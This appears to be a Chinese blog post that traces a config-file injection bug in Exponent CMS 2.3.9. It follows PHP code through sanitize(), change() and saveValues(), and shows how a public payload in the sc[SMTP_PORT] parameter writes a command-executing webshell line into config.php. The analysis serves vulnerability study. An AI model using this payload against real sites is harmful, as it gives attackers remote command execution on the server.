在 install/index.php 的第44行

expString::sanitize($_REQUEST);

跟进sanitize函数

    public static function sanitize(&$data) {

//        return $data;

        if (is_array($data)) {

            $saved_params = array();

            if (!empty($data['controller']) && $data['controller'] == 'snippet') {

                $saved_params['body'] = $data['body'];  // store snippet body

            }

            foreach ($data as $var=>$val) {

//                $data[$var] = self::sanitize($val);

                $data[$var] = self::xss_clean($val);

            }

            if (!empty($saved_params)) {

                $data = array_merge($data, $saved_params);  // add stored snippet body

            }

        } else {

            if (empty($data)) {

                return $data;

            }

            $data = self::xss_clean($data);

只经过了xss_clean的检查,继续分析,install/index.php 的第56行

<?php

...

// Create or update the config settings

if (isset($_REQUEST['sc'])) {

    if (file_exists("../framework/conf/config.php")) {

        // Update the config

        foreach ($_REQUEST['sc'] as $key => $value) {

            expSettings::change($key, $value);

        }

    }

...

}

首先如果安装成功后

if (file_exists("../framework/conf/config.php")) {

是一定进入这个分支的

跟进change函数

    public static function change($var, $val)

    {

        $conf = self::parseFile(BASE . 'framework/conf/config.php');

        $conf[$var] = $val;

        self::saveValues($conf);

    }

跟进saveValues函数

     public static function saveValues($values, $configname = '')  //FIXME only used with themes and self::change() method

     {

         $profile = null;

         $str = "<?php\n";

         foreach ($values as $directive => $value) {

             $directive = trim(strtoupper($directive));

             if ($directive == 'CURRENTCONFIGNAME') {  // save and strip out the profile name

                 $profile = $value;

                 continue;

             }

             $str .= "define(\"$directive\",";

             $value = stripslashes($value); // slashes added by POST

             if (substr($directive, -5, 5) == "_HTML") {

                 $value = htmlentities($value, ENT_QUOTES, LANG_CHARSET);

 //              $value = str_replace(array("\r\n","\r","\n"),"<br />",$value);

                 $value = str_replace(array("\r\n", "\r", "\n"), "", $value);

 //                $value = str_replace(array('\r\n', '\r', '\n'), "", $value);

                 $str .= "exponent_unhtmlentities('$value')";

             } elseif (is_int($value)) {

                 $str .= "'" . $value . "'";

             } else {

                 if ($directive != 'SESSION_TIMEOUT') {

                     $str .= "'" . str_replace("'", "\'", $value) . "'";  //FIXME is this still necessary since we stripslashes above???

                 } //                    $str .= "'".$value."'";

                 else {

                     $str .= "'" . str_replace("'", '', $value) . "'";

                 }

             }

             $str .= ");\n";

         }

         $str .= '?>';

 //        $configname = empty($values['CURRENTCONFIGNAME']) ? '' : $values['CURRENTCONFIGNAME'];

         if ($configname == '') {

             $str .= "\n<?php\ndefine(\"CURRENTCONFIGNAME\",\"$profile\");\n?>"; // add  profile name to end of active profile

         }

         self::writeFile($str, $configname);

     }
有两处很重要的操作
$value = stripslashes($value); // slashes added by POST

else {
if ($directive != 'SESSION_TIMEOUT') {
$str .= "'" . str_replace("'", "\'", $value) . "'"; //FIXME is this still necessary since we stripslashes above???
} // $str .= "'".$value."'";
else {
$str .= "'" . str_replace("'", '', $value) . "'";
}

 

综上跟踪再看看公开的payload

?sc[SMTP_PORT]=25\\');echo `$_POST[1]`;//

先是经过xss_clean 并不会对payload造成什么影响

再经过stripslashes

payload变成了

25\');echo `$_POST[1]`;//

再经过这波操作后

 $str .= "'" . str_replace("'", '', $value) . "'";

payload又变成了

25\\');echo `$_POST[1]`;//

写进文件后变成了

define("SMTP_PORT",'25\\');echo `$_POST[1]`;//');

Exponent CMS 2.3.9 配置文件写入 Getshell分析的更多相关文章

  1. 帝国CMS(EmpireCMS) v7.5配置文件写入漏洞分析

    帝国CMS(EmpireCMS) v7.5配置文件写入漏洞分析 一.漏洞描述 该漏洞是由于安装程序时没有对用户的输入做严格过滤,导致用户输入的可控参数被写入配置文件,造成任意代码执行漏洞. 二.漏洞复 ...

  2. PHP正则配合写配置文件导致Getshell

    PHP正则配合写配置文件导致Getshell,偶然间看到的一个题目, p 牛的小密圈的一个问题. 分析一下,漏洞代码: index.php <?php $str=addslashes($_GET ...

  3. 帝国CMS(EmpireCMS) v7.5后台getshell分析(CVE-2018-18086)

    帝国CMS(EmpireCMS) v7.5后台getshell分析(CVE-2018-18086) 一.漏洞描述 EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过 ...

  4. 帝国CMS(EmpireCMS) v7.5 前台XSS漏洞分析

    帝国CMS(EmpireCMS) v7.5 前台XSS漏洞分析 一.漏洞描述 该漏洞是由于javascript获取url的参数,没有经过任何过滤,直接当作a标签和img标签的href属性和src属性输 ...

  5. 帝国CMS(EmpireCMS) v7.5 后台XSS漏洞分析

    帝国CMS(EmpireCMS) v7.5 后台XSS漏洞分析 一.漏洞描述 该漏洞是由于代码只使用htmlspecialchars进行实体编码过滤,而且参数用的是ENT_QUOTES(编码双引号和单 ...

  6. Springboot 加载配置文件源码分析

    Springboot 加载配置文件源码分析 本文的分析是基于springboot 2.2.0.RELEASE. 本篇文章的相关源码位置:https://github.com/wbo112/blogde ...

  7. NLog配置文件写入数据库中

    NLog配置文件: <target xsi:type="Database" name="database" connectionString=" ...

  8. [代码审计]青云客Cms前台有条件注入至getshell,后台xss至getshell、至弹你一脸计算器

    之前写了一篇关于青云客cms的文章,发在了t00ls,就不copy过来了. 给个链接,好记录一下. https://www.t00ls.net/thread-43093-1-1.html

  9. PHPMYWIND4.6.6前台Refer头注入+后台另类getshell分析

    下载链接 https://share.weiyun.com/b060b59eaa564d729a9347a580b7e4f2 Refer头注入 全局过滤函数如下 function _RunMagicQ ...

随机推荐

  1. python3 Queue(单向队列)

    创建队列 import queue q = queue.Queue() empty(如果队列为空,返回True) import queue q = queue.Queue() print(q.empt ...

  2. EXTJS的使用

    最近一段时间一直使用Extjs作为前端,通过HTTP与.net后端进行交互,今天总结一下EXTJS,方便以后复习. 1.概念: ExtJS可以用来开发RIA也即富客户端的AJAX应用,是一个用java ...

  3. 19.java反射入门

    一.反射机制是什么反射机制是在运行状态中,对于任意一个类,都能够知道这个类的所有属性和方法:对于任意一个对象,都能够调用它的任意一个方法和属性:这种动态获取的信息以及动态调用对象的方法的功能称为jav ...

  4. KindEditor富文本编辑器使用

    我的博客本来打算使用layui的富文本编辑器,但是出了一个问题,无法获取编辑器内容,我参考官方文档,获取内容也就那几个方法而已,但是引入进去后始终获取的值为空,百度和bing都试过了,但是始终还是获取 ...

  5. Linux内核入门到放弃-页缓存和块缓存-《深入Linux内核架构》笔记

    内核为块设备提供了两种通用的缓存方案. 页缓存(page cache) 块缓存(buffer cache) 页缓存的结构 在页缓存中搜索一页所花费的时间必须最小化,以确保缓存失效的代价尽可能低廉,因为 ...

  6. localStorage sessionStorage 增强版

    1. 保留了localStorage sessionStorage的(setItem getItem removeItem clear key)api,使用上几乎差不多 2. 增强了setItem方法 ...

  7. 系统IO

    系统IO:Linux系统提供给应用程序操作文件的接口 Everything is a file  ,in  Unix 在Unix/Linux下,万物皆文件 打开文件函数原型: #include< ...

  8. (PAT)L2-004 这是二叉搜索树吗?(数据结构)

    题目链接:https://www.patest.cn/contests/gplt/L2-004 一棵二叉搜索树可被递归地定义为具有下列性质的二叉树:对于任一结点, 其左子树中所有结点的键值小于该结点的 ...

  9. StatefulSet(一):拓扑状态

    Deployment 实际上并不足以覆盖所有的应用编排问题. 造成这个问题的根本原因,在于 Deployment 对应用做了一个简单化假设. 它认为,一个应用的所有 Pod,是完全一样的.所以,它们互 ...

  10. 基本环境安装: Centos7+Java+Hadoop+Spark+HBase+ES+Azkaban

    1.  安装VM14的方法在 人工智能标签中的<跨平台踩的大坑有提到> 2. CentOS分区设置: /boot:1024M,标准分区格式创建. swap:4096M,标准分区格式创建. ...